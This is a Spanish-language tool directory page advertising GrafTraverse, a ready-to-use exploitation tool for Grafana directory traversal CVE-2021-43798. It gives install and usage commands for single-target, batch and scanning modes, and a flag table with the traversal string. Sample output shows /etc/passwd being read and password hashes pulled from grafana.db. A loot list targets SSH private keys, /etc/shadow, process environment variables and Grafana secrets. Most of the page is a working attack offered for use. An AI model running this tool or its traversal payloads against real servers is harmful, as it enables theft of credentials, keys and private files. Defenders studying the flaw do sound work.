Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
GrafTraverse-CVE-2021-43798 — CVE-2021-43798 MiNi Exploitation Framework | Kitploit
Herramientas/GitHubGitHub/asbawy/graftraverse-cve-2021-43798
Descifrado de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónRed Teaming
GitHubasbawy/graftraverse-cve-2021-43798

GrafTraverse-CVE-2021-43798

CVE-2021-43798 MiNi Exploitation Framework

Ver Repositorio
1hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

GrafTraverse - CVE-2021-43798 MiNi Framework de Explotación

Herramienta de automatización de línea de comandos para pruebas de seguridad autorizadas de Directory Traversal de Grafana (CVE-2021-43798).


Resumen

Banner

CVE-2021-43798 es una vulnerabilidad de directory traversal no autenticada en Grafana 8.x que permite a atacantes leer archivos arbitrarios en el sistema de archivos subyacente a través del endpoint /public/plugins/. La causa raíz es una sanitización incorrecta de rutas en las solicitudes de assets de plugins, permitiendo secuencias ../ para escapar del directorio previsto.

GrafTraverse es una reescritura completa de la prueba de concepto original. Corrige errores críticos en el manejo de solicitudes, añade escaneo por lotes multi-hilo, descubrimiento automático de plugins, extracción de credenciales y generación de informes estructurados, convirtiéndolo en una herramienta de nivel productivo para equipos rojos y pentesters.


Características


Instalación

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/asbawy/GrafTraverse.git
cd GrafTraverse

# Asegurarse de que requests esté disponible (viene con Kali)
pip3 install requests

# Hacer ejecutable
chmod +x GrafTraverse.py

Uso

GrafTraverse utiliza una CLI basada en subcomandos. Todos los comandos soportan --help.

1. Objetivo Único Interactivo

Lanzar el menú interactivo contra un host:

root@kitploit:~
python3 GrafTraverse.py single -u http://IP:PUERTO
root@kitploit:~
============================================================
 MODO INTERACTIVO
============================================================
 1. /etc/passwd
 2. grafana.ini
 3. grafana.db
 4. Ruta personalizada
 5. Botín automatizado completo
 6. Escanear plugins
 7. Salir
============================================================

2. Escaneo de Plugins

Identificar rápidamente qué endpoint de plugin es vulnerable sin explotación:

root@kitploit:~
python3 GrafTraverse.py scan -u http://objetivo:PUERTO

3. Escaneo por Lotes

Cargar objetivos desde un archivo y procesarlos concurrentemente:

root@kitploit:~
python3 GrafTraverse.py batch -l objetivos.txt --workers 10 --csv resultados.csv

Formato de objetivos.txt:

root@kitploit:~
http://192.168.1.10:3000
http://192.168.1.11:3000
https://grafana.objetivo.com
# Las líneas que comienzan con # se ignoran

4. Enumeración con Lista de Palabras

Alimentar una lista de archivos personalizada para traversal profundo:

root@kitploit:~
python3 GrafTraverse.py single -u http://objetivo:3000   --wordlist archivos_sensibles.txt   --output-dir ./botin   --json log.json

5. Proxy y Cabeceras Personalizadas

Enrutar a través de Burp Suite y añadir cabeceras personalizadas:

root@kitploit:~
python3 GrafTraverse.py single -u http://objetivo:3000   --proxy http://127.0.0.1:8080   -H "X-Forwarded-For: 127.0.0.1"   -H "Authorization: Bearer eyJ0..."

Referencia de Comandos

single

batch

FlagDescripción
-l, --listArchivo con URLs de objetivos (obligatorio)
--workersHilos concurrentes (por defecto: 5)
(todas las banderas de single soportadas)

scan

FlagDescripción
-u, --urlURL del objetivo (obligatorio)
(todas las banderas de red soportadas)

Ejemplo de Salida

Recuperación Exitosa de Archivos

root@kitploit:~
[+] Salida: 20260526_GrafTraverse
[*] Probando: /etc/passwd (vía alertlist)
[+] ÉXITO: /etc/passwd (1874 bytes)

------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
------------------------------------------------------------

[+] Guardado: 20260526_GrafTraverse/http___10.129.234.47_3000_passwd

Extracción de Hash de Base de Datos de Grafana

root@kitploit:~
[*] Probando: /var/lib/grafana/grafana.db (vía alertlist)
[+] ÉXITO: /var/lib/grafana/grafana.db (98304 bytes)
[+] Guardado: 20260526_GrafTraverse/http___10.129.234.47_3000_grafana.db
[*] Extraídos 3 hashes de contraseñas:
    admin:PBKDF2$sha256$10000$...base64...
    editor:PBKDF2$sha256$10000$...base64...
    viewer:PBKDF2$sha256$10000$...base64...

Archivos Objetivo (Botín Automatizado)

La secuencia de botín integrada intenta recuperar los siguientes archivos en orden:


Versiones Afectadas

  • Grafana 8.0.0 hasta 8.3.0
  • Corregido en 8.3.1 y 7.5.12
Descargar herramienta
CaracterísticaDescripción
Fuerza Bruta Multi-PluginPrueba automáticamente más de 40 plugins integrados para encontrar una ruta vulnerable
Modo InteractivoExplotación de un solo objetivo basada en menú con previsualización de archivos en vivo
Modo LoteEscaneo concurrente de múltiples objetivos con número configurable de hilos
Modo Lista de PalabrasEnumeración profunda de archivos usando listas de palabras personalizadas
Extracción Automática de HashesExtrae automáticamente hashes de contraseñas PBKDF2 del archivo grafana.db descargado
Registro EstructuradoExporta resultados a JSON y CSV para informes sin problemas
Soporte de ProxyEnruta el tráfico a través de Burp, ZAP o cualquier proxy HTTP (--proxy)
Cabeceras PersonalizadasInyecta cabeceras arbitrarias para bypass de WAF o tokens de autenticación (-H)
Personalización de TraversalSobrescribe la profundidad de traversal predeterminada para entornos no estándar (--depth)
Filtrado InteligenteElimina falsos positivos rechazando respuestas JS/CSS/HTML de plugins
Cero DependenciasSolo requiere requests (preinstalado en Kali / Parrot)
FlagDescripción
-u, --urlURL del objetivo (obligatorio)
--no-downloadModo solo vista, no guardar archivos
-t, --timeoutTiempo de espera de solicitud en segundos (por defecto: 10)
--proxyURL del proxy HTTP/HTTPS
-H, --headerCabecera personalizada (repetible)
--depthCadena de traversal (por defecto: ../../../../../../../../)
--output-dirDirectorio para guardar los archivos recuperados
--jsonAñadir resultados a un archivo de log JSON
--csvAñadir resultados a un archivo de log CSV
--wordlistArchivo que contiene rutas a enumerar
--pluginForzar un nombre de plugin específico
ArchivoTipoSensibilidad
/etc/passwdTextoEnumeración de usuarios
/etc/shadowTextoHashes de contraseñas (raramente legible)
/etc/hostsTextoTopología de red
/etc/hostnameTextoIdentificación del host
/etc/grafana/grafana.iniTextoSecretos de Grafana y credenciales de BD
/var/lib/grafana/grafana.dbBinarioBD SQLite con hashes de usuarios y claves API
/var/log/grafana/grafana.logTextoInteligencia operativa
/root/.ssh/id_rsaTextoClave privada SSH
/root/.ssh/authorized_keysTextoMapeo de acceso basado en claves
/proc/self/environTextoVariables de entorno del proceso
/proc/self/cmdlineTextoArgumentos del proceso
/proc/versionTextoVersión del kernel
/proc/mountsTextoEstructura del sistema de archivos
/etc/os-releaseTextoIdentificación del SO
/etc/issueTextoIdentificación del SO
/etc/crontabTextoTareas programadas
/etc/resolv.confTextoConfiguración de DNS